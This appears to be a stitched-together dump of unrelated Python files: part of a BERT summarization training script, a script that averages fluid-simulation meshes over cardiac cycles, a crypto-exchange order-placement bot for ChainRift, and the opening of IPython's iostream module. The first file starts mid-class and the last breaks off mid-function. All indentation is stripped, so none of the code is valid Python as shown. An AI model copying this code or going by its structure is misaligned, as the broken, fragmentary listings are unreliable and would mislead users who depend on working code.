"""A class that listens for exceptions in children processes and propagates
the tracebacks to the parent process."""
def __init__(self, error_queue):
""" init error handler """
import signal
import threading
self.error_queue = error_queue
self.children_pids = []
self.error_thread = threading.Thread(
target=self.error_listener, daemon=True)
self.error_thread.start()
signal.signal(signal.SIGUSR1, self.signal_handler)
def add_child(self, pid):
""" error handler """
self.children_pids.append(pid)
def error_listener(self):
""" error listener """
(rank, original_trace) = self.error_queue.get()
self.error_queue.put((rank, original_trace))
os.kill(os.getpid(), signal.SIGUSR1)
def signal_handler(self, signalnum, stackframe):
""" signal handler """
for pid in self.children_pids:
os.kill(pid, signal.SIGINT) # kill children processes
(rank, original_trace) = self.error_queue.get()
msg = """\n\n-- Tracebacks above this line can probably
be ignored --\n\n"""
msg += original_trace
raise Exception(msg)
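# How ErrorHandler works: error_listener blocks on the shared SimpleQueue in a
# daemon thread; when a child reports a traceback it re-queues the message and
# sends SIGUSR1 to the parent process, whose signal_handler kills the remaining
# children and raises the original traceback in the main process.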
def validate_hybrid(args, device_id):
timestep = 0
if (args.test_all):
cp_files = sorted(glob.glob(os.path.join(args.model_path, 'model_step_*.pt')))
cp_files.sort(key=os.path.getmtime)
xent_lst = []
for i, cp in enumerate(cp_files):
step = int(cp.split('.')[-2].split('_')[-1])
xent = validate(args, device_id, cp, step)
xent_lst.append((xent, cp))
max_step = xent_lst.index(min(xent_lst))
if (i - max_step > 10):
break
xent_lst = sorted(xent_lst, key=lambda x: x[0])[:3]
# print("????")
logger.info('PPL %s' % str(xent_lst))
for xent, cp in xent_lst:
step = int(cp.split('.')[-2].split('_')[-1])
test_hybrid(args, device_id, cp, step)
else:
while (True):
cp_files = sorted(glob.glob(os.path.join(args.model_path, 'model_step_*.pt')))
cp_files.sort(key=os.path.getmtime)
if (cp_files):
cp = cp_files[-1]
time_of_cp = os.path.getmtime(cp)
if (not os.path.getsize(cp) > 0):
time.sleep(60)
continue
if (time_of_cp > timestep):
timestep = time_of_cp
step = int(cp.split('.')[-2].split('_')[-1])
validate(args, device_id, cp, step)
test_hybrid(args, device_id, cp, step)
cp_files = sorted(glob.glob(os.path.join(args.model_path, 'model_step_*.pt')))
cp_files.sort(key=os.path.getmtime)
if (cp_files):
cp = cp_files[-1]
time_of_cp = os.path.getmtime(cp)
if (time_of_cp > timestep):
continue
else:
time.sleep(300)
def validate(args, device_id, pt, step):
device = "cpu" if args.visible_gpus == '-1' else "cuda"
if (pt != ''):
test_from = pt
else:
test_from = args.test_from
logger.info('Loading checkpoint from %s' % test_from)
checkpoint = torch.load(test_from, map_location=lambda storage, loc: storage)
opt = vars(checkpoint['opt'])
for k in opt.keys():
if (k in model_flags):
setattr(args, k, opt[k])
print(args)
model = HybridSummarizer(args, device, checkpoint)
model.eval()
valid_iter = data_loader.Dataloader(args, load_dataset(args, 'valid', shuffle=False),
args.batch_size, device,
shuffle=False, is_test=False)
# tokenizer = BertTokenizer.from_pretrained('/home/ybai/projects/PreSumm/PreSumm/temp/', do_lower_case=True, cache_dir=args.temp_dir)
tokenizer = BertTokenizer.from_pretrained('bert-base-uncased', do_lower_case=True, cache_dir=args.temp_dir)
symbols = {'BOS': tokenizer.vocab['[unused0]'], 'EOS': tokenizer.vocab['[unused1]'],
'PAD': tokenizer.vocab['[PAD]'], 'EOQ': tokenizer.vocab['[unused2]']}
valid_loss = abs_loss(model.abstractor.generator, symbols, model.abstractor.vocab_size, device, train=True,
label_smoothing=args.label_smoothing)
trainer = build_trainer(args, device_id, model, None, valid_loss)
stats = trainer.validate(valid_iter, step)
return stats.xent()
def test_hybrid(args, device_id, pt, step):
device = "cpu" if args.visible_gpus == '-1' else "cuda"
if (pt != ''):
test_from = pt
else:
test_from = args.test_from
logger.info('Loading checkpoint from %s' % test_from)
checkpoint = torch.load(test_from, map_location=lambda storage, loc: storage)
opt = vars(checkpoint['opt'])
for k in opt.keys():
if (k in model_flags):
setattr(args, k, opt[k])
print(args)
model = HybridSummarizer(args, device, checkpoint)
model.eval()
test_iter = data_loader.Dataloader(args, load_dataset(args, 'test', shuffle=False),
args.test_batch_size, device,
shuffle=False, is_test=True)
# tokenizer = BertTokenizer.from_pretrained('/home/ybai/projects/PreSumm/PreSumm/temp/', do_lower_case=True, cache_dir=args.temp_dir)
tokenizer = BertTokenizer.from_pretrained('bert-base-uncased', do_lower_case=True, cache_dir=args.temp_dir)
symbols = {'BOS': tokenizer.vocab['[unused0]'], 'EOS': tokenizer.vocab['[unused1]'],
'PAD': tokenizer.vocab['[PAD]'], 'EOQ': tokenizer.vocab['[unused2]']}
predictor = build_predictor(args, tokenizer, symbols, model, logger)
predictor.translate(test_iter, step)
def train_hybrid(args, device_id):
# Choose between multi-GPU and single-GPU training
if (args.world_size > 1):
train_multi_hybrid(args)
else:
# print("~~~~~~~~~~~~~~~")
train_single_hybrid(args, device_id)
def train_single_hybrid(args, device_id):
init_logger(args.log_file)
device = "cpu" if args.visible_gpus == '-1' else "cuda"
logger.info('Device ID %d' % device_id)
logger.info('Device %s' % device)
torch.manual_seed(args.seed)
random.seed(args.seed)
torch.backends.cudnn.deterministic = True
if device_id >= 0:
torch.cuda.set_device(device_id)
torch.cuda.manual_seed(args.seed)
# Re-seed the RNGs after selecting the CUDA device
torch.manual_seed(args.seed)
random.seed(args.seed)
torch.backends.cudnn.deterministic = True
if args.train_from != '':
logger.info('Loading checkpoint from %s' % args.train_from)
checkpoint = torch.load(args.train_from,
map_location=lambda storage, loc: storage)
opt = vars(checkpoint['opt'])
for k in opt.keys():
if (k in model_flags):
# Copy model flags from the checkpoint into args
setattr(args, k, opt[k])
else:
checkpoint = None
if args.train_from_extractor != '':
logger.info('Loading checkpoint from %s' % args.train_from_extractor)
checkpoint_ext = torch.load(args.train_from_extractor,
map_location=lambda storage, loc: storage)
opt = vars(checkpoint_ext['opt'])
for k in opt.keys():
if (k in model_flags):
# Copy model flags from the checkpoint into args
setattr(args, k, opt[k])
else:
checkpoint_ext = None
if args.train_from_abstractor != '':
logger.info('Loading checkpoint from %s' % args.train_from_abstractor)
checkpoint_abs = torch.load(args.train_from_abstractor,
map_location=lambda storage, loc: storage)
opt = vars(checkpoint_abs['opt'])
for k in opt.keys():
if (k in model_flags):
# Copy model flags from the checkpoint into args
setattr(args, k, opt[k])
else:
checkpoint_abs = None
def train_iter_fct():
# Build a data iterator over the dataset
if args.is_debugging:
print("YES it is debugging")
# The third argument is the batch size
return data_loader.Dataloader(args, load_dataset(args, 'test', shuffle=False), args.batch_size, device,
shuffle=False, is_test=False)
# exit()
else:
return data_loader.Dataloader(args, load_dataset(args, 'train', shuffle=True), args.batch_size, device,
shuffle=True, is_test=False)
# modules, consts, options = init_modules()
# Build the model (HybridSummarizer)
# print("1~~~~~~~~~~~~~~~~~~~~")
model = HybridSummarizer(args, device, checkpoint, checkpoint_ext=checkpoint_ext, checkpoint_abs=checkpoint_abs)
# Build the optimizer(s)
# print("2~~~~~~~~~~~~~~~~~~~~")
# optim = model_builder.build_optim(args, model, checkpoint)
if (args.sep_optim):
optim_bert = model_builder.build_optim_bert(args, model, checkpoint)
optim_dec = model_builder.build_optim_dec(args, model, checkpoint)
optim = [optim_bert, optim_dec]
# print("????????")
# print("optim")
# print(optim)
# exit()
else:
optim = [model_builder.build_optim(args, model, checkpoint)]
# Log the model structure
logger.info(model)
# print("3~~~~~~~~~~~~~~~~~~~~")
# Build the trainer
# tokenizer = BertTokenizer.from_pretrained('/home/ybai/projects/PreSumm/PreSumm/temp/', do_lower_case=True, cache_dir=args.temp_dir)
tokenizer = BertTokenizer.from_pretrained('bert-base-uncased', do_lower_case=True, cache_dir=args.temp_dir)
symbols = {'BOS': tokenizer.vocab['[unused0]'], 'EOS': tokenizer.vocab['[unused1]'],
'PAD': tokenizer.vocab['[PAD]'], 'EOQ': tokenizer.vocab['[unused2]']}
train_loss = abs_loss(model.abstractor.generator, symbols, model.abstractor.vocab_size, device, train=True,
label_smoothing=args.label_smoothing)
trainer = build_trainer(args, device_id, model, optim, train_loss)
# print("4~~~~~~~~~~~~~~~~~~~~")
# Start training
trainer.train(train_iter_fct, args.train_steps)
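# A minimal usage sketch (hypothetical, for illustration only): the functions above
# expect an argparse.Namespace carrying at least world_size, gpu_ranks, visible_gpus,
# batch_size, train_steps and the checkpoint/optimizer options referenced above.
#
# if __name__ == '__main__':
#     parser = argparse.ArgumentParser()
#     # ... add_argument calls for the options used above ...
#     args = parser.parse_args()
#     device_id = 0 if args.visible_gpus != '-1' else -1
#     train_hybrid(args, device_id)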
|
run_temporal_averaging.py
|
import pyvista
import os, sys, glob
import subprocess
import math
from natsort import natsorted
import multiprocessing
def write_pvd(base_name, dt, nsteps, extension, nprocs_sim=1):
prefix = '''<?xml version="1.0"?>
<VTKFile type="Collection" version="0.1"
byte_order="LittleEndian"
compressor="vtkZLibDataCompressor">
<Collection>
'''
suffix = ''' </Collection>
</VTKFile>
'''
initialized = False
for n in range(nsteps):
for proc in range(nprocs_sim):
if not initialized:
filename_out = base_name + '.pvd'
print("filename_out = ", filename_out)
f_write = open(filename_out, 'w')
f_write.write(prefix)
initialized = True
tmp_str = ' <DataSet timestep="'
tmp_str += '{:.14f}'.format(dt * n)
tmp_str += '" group="" part="'
tmp_str += str(proc) + '"'
tmp_str += ' file="'
if nprocs_sim > 1:
tmp_str += base_name + str(n).zfill(4) + '/' # sorted into directories
tmp_str += base_name + str(n).zfill(4) + '.'
if nprocs_sim > 1:
tmp_str += str(proc) + '.'
tmp_str += extension
tmp_str += '"/>\n'
f_write.write(tmp_str)
f_write.write(suffix)
f_write.close()
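# write_pvd emits a ParaView collection (.pvd) file; with nprocs_sim == 1 each
# entry looks roughly like
#   <DataSet timestep="0.04162500000000" group="" part="0" file="eulerian_vars_averaged0001.vtu"/>
# so ParaView can load the per-step files written below as a single time series.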
def read_distributed_vtr(dir_name):
files = natsorted(glob.glob(dir_name + "/*.vtr"))
#print("files = ", files)
blocks = pyvista.MultiBlock([pyvista.read(f) for f in files])
return blocks.combine()
def average_eulerian_mesh_one_step(idx_mri_read, eulerian_var_names, times, cycle_duration, cycles_to_output, dt_mri_read, base_dir, base_name_out, extension):
# always start with initial eulerian mesh
dir_name = "eulerian_vars" + str(0).zfill(4)
mesh = read_distributed_vtr(dir_name)
n_to_average = 0
for var_name in eulerian_var_names:
mesh[var_name] *= 0.0
# average over times
for idx, t in enumerate(times):
# check if time in range
cycle_num = math.floor(t / cycle_duration)
# only include cycles selected for output
if cycle_num in cycles_to_output:
dir_name = "eulerian_vars" + str(idx).zfill(4)
# time since start of this cycle
t_reduced = t % cycle_duration
idx_mri_read_temp = math.floor(t_reduced / dt_mri_read)
if idx_mri_read == idx_mri_read_temp:
print("processing step ", idx)
mesh_tmp = read_distributed_vtr(dir_name)
for var_name in eulerian_var_names:
mesh[var_name] += mesh_tmp[var_name]
n_to_average += 1.0
# print("t = ", t, "t_reduced = ", t_reduced, "idx_mri_read = ", idx_mri_read)
for var_name in eulerian_var_names:
# if there is nothing to average, the output mesh stays all zeros
if n_to_average != 0:
mesh[var_name] /= float(n_to_average)
fname = base_name_out + str(idx_mri_read).zfill(4) + '.' + extension
mesh.save(base_dir + "/" + fname)
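# Each worker above averages every snapshot whose phase within the cycle falls in
# the same MRI bin: bin index = floor((t mod cycle_duration) / dt_mri_read),
# restricted to the cycles listed in cycles_to_output, then divides by the sample count.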
if __name__ == '__main__':
if len(sys.argv) >= 2:
nprocs_sim = int(sys.argv[1]) # number of procs in the sim, which determines how many files go into the decomposed data
else:
print("using default nprocs_sim = 1")
nprocs_sim = 1
# first make sure there is a times file
if not os.path.isfile('times.txt'):
subprocess.call('visit -cli -nowin -s ~/copies_scripts/write_times_file_visit.py', shell=True)
times = []
times_file = open('times.txt', 'r')
for line in times_file:
times.append(float(line))
eulerian = True
lagrangian = True
first_cycle = True
second_cycle = False
if first_cycle:
cycles_to_output = [0] # zero indexed
# set up some directories
base_dir = "vis_data_averaged_cycle_1"
elif second_cycle:
cycles_to_output = [1] # zero indexed
# set up some directories
base_dir = "vis_data_averaged_cycle_2"
else:
cycles_to_output = [1,2,3] # zero indexed
# set up some directories
base_dir = "vis_data_averaged_cycle_2_3_4"
cycle_duration = 8.3250000000000002e-01
mri_read_times_per_cycle = 10
dt_mri_read = cycle_duration / mri_read_times_per_cycle
output_times_per_cycle = 20
dt_output = cycle_duration / output_times_per_cycle
if not os.path.exists(base_dir):
os.mkdir(base_dir)
if eulerian:
eulerian_var_names = ['P','Omega', 'U']
# output file extension
extension = 'vtu'
suffix = "_averaged"
base_name_out = "eulerian_vars_mri_freq"
# average all the Eulerian files here
# for idx_mri_read in range(mri_read_times_per_cycle):
# average_eulerian_mesh_one_step(idx_mri_read, eulerian_var_names, times, cycle_duration, cycles_to_output, dt_mri_read, base_dir, base_name_out, extension)
jobs = []
for idx_mri_read in range(mri_read_times_per_cycle):
p = multiprocessing.Process(target=average_eulerian_mesh_one_step, args=(idx_mri_read, eulerian_var_names, times, cycle_duration, cycles_to_output, dt_mri_read, base_dir, base_name_out, extension))
jobs.append(p)
p.start()
for p in jobs:
p.join()
# for idx_output in range(output_times_per_cycle):
# eulerian_dir_name = base_dir + '/' + 'eulerian_vars' + suffix + str(idx_output).zfill(4)
# if not os.path.exists(eulerian_dir_name):
# os.mkdir(eulerian_dir_name)
# only average cycle 2
# cycles_to_include = [2]
# loops over parallel data structure as outer loop
# for proc_num in range(nprocs_sim):
# read and zero meshes to use to accumulate from first mesh
dir_name = "eulerian_vars" + str(0).zfill(4)
# read all time zero meshes
# meshes_mri_read = []
# n_to_average = []
# for idx_mri_read in range(mri_read_times_per_cycle):
# meshes_mri_read.append(read_distributed_vtr(dir_name))
# n_to_average.append(0)
# for var_name in eulerian_var_names:
# meshes_mri_read[idx_mri_read][var_name] *= 0.0
meshes_mri_read = []
for idx_mri_read in range(mri_read_times_per_cycle):
fname = base_name_out + str(idx_mri_read).zfill(4) + '.' + extension
meshes_mri_read.append( pyvista.read(base_dir + "/" + fname) )
meshes_output = []
for idx_output in range(output_times_per_cycle):
meshes_output.append(read_distributed_vtr(dir_name))
for var_name in eulerian_var_names:
meshes_output[idx_output][var_name] *= 0.0
# # average over times
# for idx, t in enumerate(times):
# # check if time in range
# cycle_num = math.floor(t / cycle_duration)
# # skip cycle one
# if cycle_num in cycles_to_output:
# print("processing step ", idx)
# dir_name = "eulerian_vars" + str(idx).zfill(4)
# # time since start of this cycle
# t_reduced = t % cycle_duration
# idx_mri_read = math.floor(t_reduced / dt_mri_read)
# mesh_tmp = read_distributed_vtr(dir_name)
# for var_name in eulerian_var_names:
# meshes_mri_read[idx_mri_read][var_name] += mesh_tmp[var_name]
# n_to_average[idx_mri_read] += 1.0
# # print("t = ", t, "t_reduced = ", t_reduced, "idx_mri_read = ", idx_mri_read)
# print("n_to_average = ", n_to_average)
# # convert sums to averages
# for idx_mri_read in range(mri_read_times_per_cycle):
# for var_name in eulerian_var_names:
# meshes_mri_read[idx_mri_read][var_name] /= float(n_to_average[idx_mri_read])
# linearly interpolate before output
for idx_mri_read in range(mri_read_times_per_cycle):
for var_name in eulerian_var_names:
meshes_output[2*idx_mri_read][var_name] = meshes_mri_read[idx_mri_read][var_name]
for idx_mri_read in range(mri_read_times_per_cycle):
idx_mri_read_next = (idx_mri_read + 1) % mri_read_times_per_cycle
for var_name in eulerian_var_names:
meshes_output[2*idx_mri_read + 1][var_name] = 0.5 * (meshes_mri_read[idx_mri_read][var_name] + meshes_mri_read[idx_mri_read_next][var_name])
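# Note: the interpolation above assumes output_times_per_cycle == 2 * mri_read_times_per_cycle
# (here 20 and 10): even output slots copy an MRI bin, odd slots take the midpoint of
# neighbouring bins, wrapping around at the end of the cycle.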
for idx_output in range(output_times_per_cycle):
eulerian_dir_name = base_dir
fname = "eulerian_vars" + suffix + str(idx_output).zfill(4) + '.' + extension
meshes_output[idx_output].save(eulerian_dir_name + "/" + fname)
# summary file
nprocs_output = 1
write_pvd("eulerian_vars" + suffix, dt_output, output_times_per_cycle, extension, nprocs_output)
os.rename("eulerian_vars" + suffix + '.pvd', base_dir + "/eulerian_vars" + suffix + '.pvd')
if lagrangian:
suffix = "_averaged"
for lag_file in os.listdir('..'):
if lag_file.endswith('.vertex'):
print("found lag file ", lag_file, ", processing ")
base_name_lag = lag_file.rsplit('.', 1)[0]
print("base_name_lag = ", base_name_lag)
# read and zero meshes to use to accumulate from first mesh
fname = base_name_lag + str(0).zfill(4) + '.vtu'
if not os.path.isfile(fname):
print("vtu file not found, cannot process this file, continuing")
continue
meshes_mri_read = []
n_to_average = []
for idx_mri_read in range(mri_read_times_per_cycle):
meshes_mri_read.append(pyvista.read(fname))
n_to_average.append(0)
meshes_mri_read[idx_mri_read].points *= 0.0
meshes_output = []
for idx_output in range(output_times_per_cycle):
meshes_output.append(pyvista.read(fname))
meshes_output[idx_output].points *= 0.0
# average over times
for idx, t in enumerate(times):
# check if time in range
cycle_num = math.floor(t / cycle_duration)
# only include cycles selected for output
if cycle_num in cycles_to_output:
fname = base_name_lag + str(idx).zfill(4) + '.vtu'
# time since start of this cycle
t_reduced = t % cycle_duration
idx_mri_read = math.floor(t_reduced / dt_mri_read)
mesh_tmp = pyvista.read(fname)
meshes_mri_read[idx_mri_read].points += mesh_tmp.points
n_to_average[idx_mri_read] += 1.0
# print("t = ", t, "t_reduced = ", t_reduced, "idx_mri_read = ", idx_mri_read)
print("n_to_average = ", n_to_average)
# convert sums to averages
for idx_mri_read in range(mri_read_times_per_cycle):
meshes_mri_read[idx_mri_read].points /= float(n_to_average[idx_mri_read])
# linearly interpolate before output
for idx_mri_read in range(mri_read_times_per_cycle):
meshes_output[2*idx_mri_read].points = meshes_mri_read[idx_mri_read].points
for idx_mri_read in range(mri_read_times_per_cycle):
idx_mri_read_next = (idx_mri_read + 1) % mri_read_times_per_cycle
meshes_output[2*idx_mri_read + 1].points = 0.5 * (meshes_mri_read[idx_mri_read].points + meshes_mri_read[idx_mri_read_next].points)
for idx_output in range(output_times_per_cycle):
fname = base_name_lag + suffix + str(idx_output).zfill(4) + '.vtu'
meshes_output[idx_output].save(base_dir + "/" + fname)
# os.rename(fname, base_dir + "/" + base_name_lag + suffix + '.pvd')
# summary file
extension = 'vtu'
write_pvd(base_name_lag + suffix, dt_output, output_times_per_cycle, extension, 1)
os.rename(base_name_lag + suffix + '.pvd', base_dir + "/" + base_name_lag + suffix + '.pvd')
|
OrderLogic.py
|
from threading import Thread, Lock
from settings import Settings
from asyncblink import signal
from random import uniform
from helpers import Logger
curId = "OrderLogic"
class ChainRiftData(object):
balances = {}
openOrders = {}
for ticker, orderTypes in Settings.chainRiftPairPlacement.items():
for orderType in orderTypes:
openOrders[ticker + orderType] = {"sum": 0, "orders": {}}
@classmethod
def get_balance(cls, coin):
if coin in cls.balances:
return cls.balances[coin]
@classmethod
def set_balances(cls, data):
for balance in data:
cls.balances[balance["coin"]] = balance["quantity"]
@classmethod
def process_balance_changes(cls, data):
for change in data:
if change["coin"] in cls.balances:
cls.balances[change["coin"]] += change["quantity"]
@classmethod
def process_order_changes(cls, data):
for change in data:
orderKey = change["symbol"] + change["type"].lower()
try:
if change["action"] == "Add":
cls.openOrders[orderKey]["sum"] += change["leaveqty"]
cls.openOrders[orderKey]["orders"][change["orderid"]] = OrderItem(change)
elif change["action"] == "Update":
try:
tmp = cls.openOrders[orderKey]["orders"].pop(change["orderid"])
cls.openOrders[orderKey]["sum"] -= tmp.leaveQty
cls.openOrders[orderKey]["sum"] += change["leaveqty"]
cls.openOrders[orderKey]["orders"][change["orderid"]] = OrderItem(change)
except KeyError:
# order not tracked yet; nothing to update
pass
elif change["action"] == "Remove":
try:
tmp = cls.openOrders[orderKey]["orders"].pop(change["orderid"])
cls.openOrders[orderKey]["sum"] -= tmp.leaveQty
except KeyError:
# order already removed or never tracked
pass
except Exception as e:
Logger.info(curId, e, orderKey, cls.openOrders)
raise e
@classmethod
def get_open_orders(cls):
return cls.openOrders
class OrderActionsForPush(object):
def __init__(self):
self.init_storage()
self.lock = Lock()
def init_storage(self):
self.place = []
self.move = []
self.cancel = []
def place_order(self, pair, quantity, price, isbuy):
order = {
"symbol": pair,
"quantity": format(quantity, '.8f'),
"price": format(price, '.8f'),
"type": isbuy,
"tempid": uniform(0, 10000000000)
}
self.place.append(order)
if len(self.place) + 1 >= Settings.chainriftMaxOrdersInBulk:
raise MaxOrdersToPlaceException()
def move_order(self, orderid, price):
order = {
"id": orderid,
"price": format(price, '.8f'),
}
self.move.append(order)
if len(self.move) + 1 >= Settings.chainriftMaxOrdersInBulk:
raise MaxOrdersToMoveException()
def cancel_order(self, orderid):
self.cancel.append(orderid)
if len(self.cancel) + 1 >= Settings.chainriftMaxOrdersInBulk:
raise MaxOrdersToCancelException()
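# OrderActionsForPush batches place/move/cancel actions; once a batch approaches
# Settings.chainriftMaxOrdersInBulk the matching Max*Exception is raised so the
# caller can flush the batch over the 'processorders' signal and start a new one
# (see process_coinpair_orders below).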
class OrderManagement(object):
processOrdersSignal = signal('processorders')
oafp = {}
for ticker, orderTypes in Settings.chainRiftPairPlacement.items():
for orderType in orderTypes:
oafp[ticker + orderType] = OrderActionsForPush()
@classmethod
async def process_orders(cls, data):
t = Thread(target=cls.process_orders2, args=(data,))
t.start()
@classmethod
def process_orders2(cls, data):
if data == "BalancesRetrieved":
for ticker in Settings.chainRiftPairPlacement.keys():
for isbuy in Settings.chainRiftPairPlacement[ticker]:
orderKey = ticker + isbuy
try:
cls.oafp[orderKey].lock.acquire()
cls.process_coinpair_orders(ticker, isbuy)
cls.process_oafp_leftovers(orderKey)
finally:
cls.oafp[orderKey].init_storage()
cls.oafp[orderKey].lock.release()
else:
ticker = data[0]
priceUpdate = data[2]
if priceUpdate != "lastPrice":
if ticker in Settings.chainRiftPairPlacement:
orderKey = ticker + priceUpdate
try:
cls.oafp[orderKey].lock.acquire()
cls.process_coinpair_orders(ticker, priceUpdate)
cls.process_oafp_leftovers(orderKey)
finally:
cls.oafp[orderKey].init_storage()
cls.oafp[orderKey].lock.release()
@classmethod
def process_oafp_leftovers(cls, orderKey):
# Process leftover orders that might have not been sent
if len(cls.oafp[orderKey].place) > 0:
cls.processOrdersSignal.send(("place", cls.oafp[orderKey].place))
if len(cls.oafp[orderKey].move) > 0:
cls.processOrdersSignal.send(("move", cls.oafp[orderKey].move))
if len(cls.oafp[orderKey].cancel) > 0:
cls.processOrdersSignal.send(("cancel", cls.oafp[orderKey].cancel))
@classmethod
def is_order_price_in_range(cls, order):
orderType = "buy" if order.isBuy else "sell"
curTicker = Settings.tickerPrices[order.symbol][orderType]
return curTicker * Settings.priceRanges[orderType][0] <= order.price <= curTicker * Settings.priceRanges[orderType][1]
@classmethod
def process_coinpair_orders(cls, ticker, isbuy):
# Track the quantity prepared in this pass; together with the quantity already open it must stay below maxQuantity
tmp = 0
orderKey = ticker + isbuy
maxQuantity = Settings.chainRiftPairPlacement[ticker][isbuy]
# If price is 0 (default) do not place orders
if Settings.tickerPrices[ticker][isbuy] == 0:
return
# Move orders that need moving considering the range
for order in sorted(ChainRiftData.openOrders[orderKey]["orders"].values(),
key=lambda o: o.price, reverse=True if isbuy == "buy" else False):
isPriceInRange = cls.is_order_price_in_range(order)
if isPriceInRange:
continue
else:
price = Settings.tickerPrices[ticker][isbuy] * uniform(Settings.priceRanges[isbuy][0], Settings.priceRanges[isbuy][1])
try:
cls.oafp[orderKey].move_order(order.orderId, price)
except MaxOrdersToMoveException:
cls.processOrdersSignal.send(("move", cls.oafp[orderKey].move))
cls.oafp[orderKey].move = []
except Exception as e:
Logger.exception(curId, "Unexpected exception occurred while moving order", order.orderId, e)
# Place new orders
errorCounter = 0
while tmp + ChainRiftData.openOrders[orderKey]["sum"] < maxQuantity:
quantity = maxQuantity * 0.1 * uniform(0.3, 0.7)
price = Settings.tickerPrices[ticker][isbuy] * uniform(Settings.priceRanges[isbuy][0], Settings.priceRanges[isbuy][1])
try:
cls.oafp[orderKey].place_order(ticker, quantity, price, isbuy)
tmp += quantity
except MaxOrdersToPlaceException:
errorCounter += 1
cls.processOrdersSignal.send(("place", cls.oafp[orderKey].place))
cls.oafp[orderKey].place = []
except MaxOrdersToMoveException:
errorCounter += 1
cls.processOrdersSignal.send(("move", cls.oafp[orderKey].move))
cls.oafp[orderKey].move = []
except MaxOrdersToCancelException:
errorCounter += 1
cls.processOrdersSignal.send(("cancel", cls.oafp[orderKey].cancel))
cls.oafp[orderKey].cancel = []
except Exception as e:
errorCounter += 1
Logger.exception(curId, "Unexpected exception occurred while preparing orders", e)
if errorCounter >= 5:
Logger.info(curId, "An error occurred while preparing orders for", ticker)
break
processChangedOrdersSignal = signal('processchangedorders')
processChangedOrdersSignal.connect(ChainRiftData.process_order_changes)
processChangedBalancesSignal = signal('processchangedbalances')
processChangedBalancesSignal.connect(ChainRiftData.process_balance_changes)
class MaxOrdersToPlaceException(Exception):
pass
class MaxOrdersToMoveException(Exception):
pass
class MaxOrdersToCancelException(Exception):
pass
class OrderItem(object):
def __init__(self, jsonOrder):
self.orderId = jsonOrder["orderid"]
self.symbol = jsonOrder["symbol"]
self.leaveQty = jsonOrder["leaveqty"]
self.quantity = jsonOrder["quantity"]
self.price = jsonOrder["price"]
self.isBuy = True if jsonOrder["type"].lower() == "buy" else False
def __str__(self):
return "{" + ', '.join(['{key}: {value}'.format(key=key, value=self.__dict__.get(key)) for key in self.__dict__]) + "}"
def __repr__(self):
return self.__str__()
|
iostream.py
|
"""Wrappers for forwarding stdout/stderr over zmq"""
# Copyright (c) IPython Development Team.
# Distributed under the terms of the Modified BSD License.
import atexit
from binascii import b2a_hex
from collections import deque
from imp import lock_held as import_lock_held
import os
import sys
import threading
import warnings
from weakref import WeakSet
import traceback
from io import StringIO, TextIOBase
import io
import zmq
if zmq.pyzmq_version_info() >= (17, 0):
from tornado.ioloop import IOLoop
else:
# deprecated since pyzmq 17
from zmq.eventloop.ioloop import IOLoop
from zmq.eventloop.zmqstream import ZMQStream
from jupyter_client.session import extract_header
#-----------------------------------------------------------------------------
# Globals
#-----------------------------------------------------------------------------
MASTER = 0
CHILD = 1
#-----------------------------------------------------------------------------
# IO classes
#-----------------------------------------------------------------------------
class IOPubThread(object):
"""An object for sending IOPub messages in a background thread
Prevents a blocking main thread from delaying output from threads.
IOPubThread(pub_socket).background_socket is a Socket-API-providing object
whose IO is always run in a thread.
"""
def __init__(self, socket, pipe=False):
"""Create IOPub thread
Parameters
----------
socket : zmq.PUB Socket
the socket on which messages will be sent.
pipe : bool
Whether this process should listen for IOPub messages
piped from subprocesses.
"""
self.socket = socket
self.background_socket = BackgroundSocket(self)
self._master_pid = os.getpid()
self._pipe_flag = pipe
self.io_loop = IOLoop(make_current=False)
if pipe:
self._setup_pipe_in()
self._local = threading.local()
self._events = deque()
self._event_pipes = WeakSet()
self._setup_event_pipe()
self.thread = threading.Thread(target=self._thread_main)
self.thread.daemon = True
self.thread.pydev_do_not_trace = True
self.thread.is_pydev_daemon_thread = True
def _thread_main(self):
"""The inner loop that's actually run in a thread"""
self.io_loop.make_current()
self.io_loop.start()
self.io_loop.close(all_fds=True)
def _setup_event_pipe(self):
"""Create the PULL socket listening for events that should fire in this thread."""
ctx = self.socket.context
pipe_in = ctx.socket(zmq.PULL)
pipe_in.linger = 0
_uuid = b2a_hex(os.urandom(16)).decode('ascii')
iface = self._event_interface = 'inproc://%s' % _uuid
pipe_in.bind(iface)
self._event_puller = ZMQStream(pipe_in, self.io_loop)
self._event_puller.on_recv(self._handle_event)
@property
def _event_pipe(self):
"""thread-local event pipe for signaling events that should be processed in the thread"""
try:
event_pipe = self._local.event_pipe
except AttributeError:
# new thread, new event pipe
ctx = self.socket.context
event_pipe = ctx.socket(zmq.PUSH)
event_pipe.linger = 0
event_pipe.connect(self._event_interface)
self._local.event_pipe = event_pipe
# WeakSet so that event pipes will be closed by garbage collection
# when their threads are terminated
self._event_pipes.add(event_pipe)
return event_pipe
def _handle_event(self, msg):
"""Handle an event on the event pipe
Content of the message is ignored.
Whenever *an* event arrives on the event stream,
*all* waiting events are processed in order.
"""
# freeze event count so new writes don't extend the queue
# while we are processing
n_events = len(self._events)
for i in range(n_events):
event_f = self._events.popleft()
event_f()
def _setup_pipe_in(self):
"""setup listening pipe for IOPub from forked subprocesses"""
ctx = self.socket.context
# use UUID to authenticate pipe messages
self._pipe_uuid = os.urandom(16)
pipe_in = ctx.socket(zmq.PULL)
pipe_in.linger = 0
try:
self._pipe_port = pipe_in.bind_to_random_port("tcp://127.0.0.1")
except zmq.ZMQError as e:
warnings.warn("Couldn't bind IOPub Pipe to 127.0.0.1: %s" % e +
"\nsubprocess output will be unavailable."
)
self._pipe_flag = False
pipe_in.close()
return
self._pipe_in = ZMQStream(pipe_in, self.io_loop)
self._pipe_in.on_recv(self._handle_pipe_msg)
def _handle_pipe_msg(self, msg):
"""handle a pipe message from a subprocess"""
if not self._pipe_flag or not self._is_master_process():
return
if msg[0] != self._pipe_uuid:
print("Bad pipe message: %s", msg, file=sys.__stderr__)
return
self.send_multipart(msg[1:])
def _setup_pipe_out(self):
# must be new context after fork
ctx = zmq.Context()
pipe_out = ctx.socket(zmq.PUSH)
pipe_out.linger = 3000 # 3s timeout for pipe_out sends before discarding the message
pipe_out.connect("tcp://127.0.0.1:%i" % self._pipe_port)
return ctx, pipe_out
def _is_master_process(self):
return os.getpid() == self._master_pid
def _check_mp_mode(self):
"""check for forks, and switch to zmq pipeline if necessary"""
if not self._pipe_flag or self._is_master_process():
return MASTER
else:
return CHILD
def start(self):
"""Start the IOPub thread"""
self.thread.start()
# make sure we don't prevent process exit
# I'm not sure why setting daemon=True above isn't enough, but it doesn't appear to be.
atexit.register(self.stop)
def stop(self):
